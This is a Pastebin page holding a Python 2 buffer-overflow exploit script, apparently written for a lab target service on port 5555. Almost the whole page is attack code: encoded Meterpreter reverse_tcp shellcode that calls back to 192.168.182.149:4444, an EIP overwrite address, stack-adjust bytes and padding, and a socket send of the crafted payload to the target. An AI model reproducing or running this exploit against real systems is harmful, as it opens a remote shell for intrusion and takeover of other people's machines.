Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- #msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.182.149 R |msfencode -e x86/alpha_mixed -b "\x40" -t ruby
- #x86/alpha_mixed succeeded with size 641 (iteration=1)
- #554 bytes exactly = chunk1
- shell = ("\x89\xe0\xd9\xc5\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49"
- "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
- "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
- "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
- "\x75\x4a\x49\x69\x6c\x6b\x58\x6d\x59\x45\x50\x73\x30\x33"
- "\x30\x53\x50\x6c\x49\x49\x75\x35\x61\x78\x52\x72\x44\x4c"
- "\x4b\x36\x32\x50\x30\x6c\x4b\x32\x72\x76\x6c\x6c\x4b\x43"
- "\x62\x75\x44\x6c\x4b\x73\x42\x34\x68\x64\x4f\x4f\x47\x50"
- "\x4a\x45\x76\x75\x61\x39\x6f\x64\x71\x59\x50\x4c\x6c\x55"
- "\x6c\x31\x71\x43\x4c\x73\x32\x76\x4c\x57\x50\x6a\x61\x38"
- "\x4f\x44\x4d\x56\x61\x79\x57\x4a\x42\x38\x70\x62\x72\x70"
- "\x57\x6e\x6b\x73\x62\x54\x50\x4e\x6b\x33\x72\x37\x4c\x76"
- "\x61\x6e\x30\x6e\x6b\x63\x70\x51\x68\x6b\x35\x39\x50\x54"
- "\x34\x42\x6a\x76\x61\x4e\x30\x36\x30\x6c\x4b\x51\x58\x77"
- "\x68\x6c\x4b\x71\x48\x65\x70\x57\x71\x6b\x63\x59\x73\x57"
- "\x4c\x73\x79\x4c\x4b\x35\x64\x4c\x4b\x33\x31\x78\x56\x70"
- "\x31\x39\x6f\x74\x71\x79\x50\x6c\x6c\x59\x51\x4a\x6f\x56"
- "\x6d\x66\x61\x6a\x67\x34\x78\x4d\x30\x72\x55\x4c\x34\x43"
- "\x33\x61\x6d\x6b\x48\x75\x6b\x51\x6d\x75\x74\x43\x45\x38"
- "\x62\x76\x38\x4c\x4b\x30\x58\x66\x44\x55\x51\x6a\x73\x30"
- "\x66\x6c\x4b\x74\x4c\x50\x4b\x6e\x6b\x43\x68\x57\x6c\x37"
- "\x71\x39\x43\x4e\x6b\x34\x44\x6e\x6b\x67\x71\x38\x50\x6e"
- "\x69\x51\x54\x56\x44\x61\x34\x31\x4b\x61\x4b\x55\x31\x63"
- "\x69\x30\x5a\x32\x71\x69\x6f\x69\x70\x31\x48\x31\x4f\x52"
- "\x7a\x6c\x4b\x62\x32\x7a\x4b\x6b\x36\x63\x6d\x61\x78\x66"
- "\x53\x44\x72\x35\x50\x57\x70\x71\x78\x62\x57\x30\x73\x66"
- "\x52\x43\x6f\x71\x44\x50\x68\x50\x4c\x73\x47\x77\x56\x65"
- "\x57\x79\x6f\x69\x45\x4d\x68\x7a\x30\x53\x31\x65\x50\x63"
- "\x30\x74\x69\x6f\x34\x62\x74\x66\x30\x35\x38\x71\x39\x6d"
- "\x50\x70\x6b\x65\x50\x49\x6f\x4a\x75\x62\x70\x62\x70\x46"
- "\x30\x72\x70\x51\x50\x56\x30\x31\x50\x36\x30\x65\x38\x6a"
- "\x4a\x36\x6f\x6b\x6f\x69\x70\x6b\x4f\x4b\x65\x4e\x77\x33"
- "\x5a\x56\x65\x75\x38\x49\x50\x6f\x58\x68\x36\x6e\x75\x52"
- "\x48\x77\x72\x73\x30\x56\x71\x51\x4c\x4d\x59\x48\x66\x63"
- "\x5a\x46\x70\x61\x46\x51\x47\x71\x78\x4c\x59\x49\x35\x73"
- "\x44\x35\x31\x4b\x4f\x6a\x75\x4d\x55\x4b\x70\x30\x74\x76"
- "\x6c\x59\x6f\x72\x6e\x76\x68\x72\x55\x7a\x4c\x61\x78\x78"
- "\x70\x68\x35\x4c\x62\x52\x76\x4b\x4f\x4b\x65\x52\x4a\x53"
- "\x30\x51\x7a\x33\x34\x76\x36\x51\x47\x50\x68\x56\x62\x79"
- "\x49\x4b\x78\x63\x6f\x49\x6f\x6a\x75\x4e\x6b\x66\x56\x32"
- "\x4a\x73\x70\x32\x48\x33\x30\x44\x50\x55\x50\x55\x50\x51"
- "\x46\x50\x6a\x75\x50\x61\x78\x72\x78\x39\x34\x63\x63\x6d"
- "\x35\x39\x6f\x49\x45\x4f\x63\x50\x53\x63\x5a\x37\x70\x46"
- "\x36\x33\x63\x50\x57\x53\x58\x33\x32\x49\x49\x78\x48\x31"
- "\x4f\x49\x6f\x4e\x35\x66\x61\x68\x43\x56\x49\x4f\x36\x4f"
- "\x75\x6c\x36\x63\x45\x4a\x4c\x58\x43\x41\x41")
- shell_chunk1 = shell[:554]
- shell_chunk2 = shell[554:]
- #0x775e3422
- eip = "\x22\x34\x5e\x77"
- adjust = "\x81\xc4\x24\xfa\xff\xff"
- fill = "A" * (1024 - len(shell_chunk2))
- junk = "D" * (10000 - len(shell_chunk2) - len(fill) - len(eip) - len(adjust) - len(shell_chunk1))
- buff = shell_chunk2 + fill + eip + adjust + shell_chunk1 + junk
- print "chunk 1 is " + str(len(shell_chunk1))
- print "\nchunk 2 is " + str(len(shell_chunk2))
- s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- connect=s.connect(('192.168.182.128',5555))
- s.send('@F506 '+buff+'@\r\npwnag3\r\n\r\n')
- s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement